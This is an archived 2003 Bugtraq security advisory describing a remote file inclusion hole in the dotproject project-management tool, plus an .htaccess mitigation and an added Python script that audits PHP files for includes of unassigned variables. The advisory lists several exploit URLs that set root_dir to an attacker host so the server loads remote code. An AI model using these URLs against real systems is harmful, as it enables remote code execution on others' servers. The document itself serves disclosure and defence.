A non-official patch has been created for this hole and is published on http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=us (English version).

>From: mindwarperat_private
>To: bugtraqat_private
>Subject: dotproject Remote Code Execution Vulnerability
>Date: Wed, 29 Jan 2003 04:02:24 -0800
>
>dotproject Remote Code Execution Vulnerability (By Mindwarper)
>
><------- ------->
>
>----------------------
>Vendor Information:
>----------------------
>
>Homepage : http://www.dotproject.net
>Vendor : informed
>Mailed advisory: 28/01/03
>Vendor Response : None
>
>
>----------------------
>Affected Versions:
>----------------------
>
>dev20030121
>
>
>----------------------
>Vulnerability:
>----------------------
>
>
>dotproject is a PHP+MySQL beta level web based project management and
>tracking tool that dotmarketing started in Dec. 2000.
>Inside the directory /modules/ multiple files try to include
>classdefs/date.php without defining $root_dir first and allow remote
>attackers to inject their own servers if globals are set on.
>
>Example Code from modules/projects/addedit.php:
>
>******
>
><?php
>##
>## Files modules: index page re-usable sub-table
>##
>
>require_once( "$root_dir/classdefs/date.php" );
>$df = $AppUI->getPref('SHDATEFORMAT');
>$tf = $AppUI->getPref('TIMEFORMAT');
>
>******
>
>As you can see nothing happens before the require_once function is called
>and therefore with globals set on an attacker may include remote files.
>
>Example:
>
>http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker
>
>this works also on
>
>http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker
>http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker
>http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
>http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
>http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker
>
>
>----------------------
>Solution:
>----------------------
>
>Please check the vendor's website for new patches.
>
>As a temporary solution, create a .htaccess file that contains 'Deny from
>all'. Place it in the /modules/ directory and that should block remote
>users from accessing it.
>
>
>----------------------
>Contact:
>----------------------
>
>Name: Mindwarper
>Email: mindwarperat_private
>Website: http://mindlock.bestweb.net
>
>
><------- ------->
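
An added example, not part of the original advisory or of dotproject: a heuristic Python audit check for the pattern described above, an include/require whose path starts with a variable that the same file never assigns beforehand. The function name, the regexes and the hardened sample are assumptions made for illustration; each file is checked on its own because the advisory's point is that module files can be requested directly.

```python
import re

# include/require (optionally _once) whose path argument begins with a PHP variable
INCLUDE_RE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(?\s*["\']?\s*\{?\$(\w+)', re.I)
# plain assignment "$name =", excluding "==" / "===" comparisons
ASSIGN_RE = re.compile(r'\$(\w+)\s*=(?!=)')

def find_unset_includes(source):
    """Return (line_no, variable, statement) for every include/require that
    uses a variable with no earlier assignment in the same file.
    Heuristic: line based, does not parse strings or multi-line statements."""
    assigned = set()
    findings = []
    for no, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        if line.startswith(('#', '//', '*', '/*')):
            continue  # skip comment lines such as the "##" banner
        m = INCLUDE_RE.search(line)
        if m and m.group(1) not in assigned:
            findings.append((no, m.group(1), line))
        assigned.update(ASSIGN_RE.findall(line))
    return findings

# Snippet quoted in the advisory (modules/projects/addedit.php)
VULNERABLE = '''<?php
##
## Files modules: index page re-usable sub-table
##

require_once( "$root_dir/classdefs/date.php" );
$df = $AppUI->getPref('SHDATEFORMAT');
'''

# Constructed hardened variant (assumption, not the vendor's or phpsecure's patch):
# the script sets $root_dir itself, overriding any request-supplied value.
HARDENED = VULNERABLE.replace(
    'require_once(', '$root_dir = dirname(__FILE__) . "/../..";\nrequire_once(')

if __name__ == '__main__':
    for name, src in (('vulnerable', VULNERABLE), ('hardened', HARDENED)):
        print(name, find_unset_includes(src))
```

A finding is a lead for manual review, not proof of exposure: whether the variable is attacker-controlled still depends on register_globals and on whether the file is reachable directly.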
This archive was generated by hypermail 2b30 : Wed Jan 29 2003 - 09:43:20 PST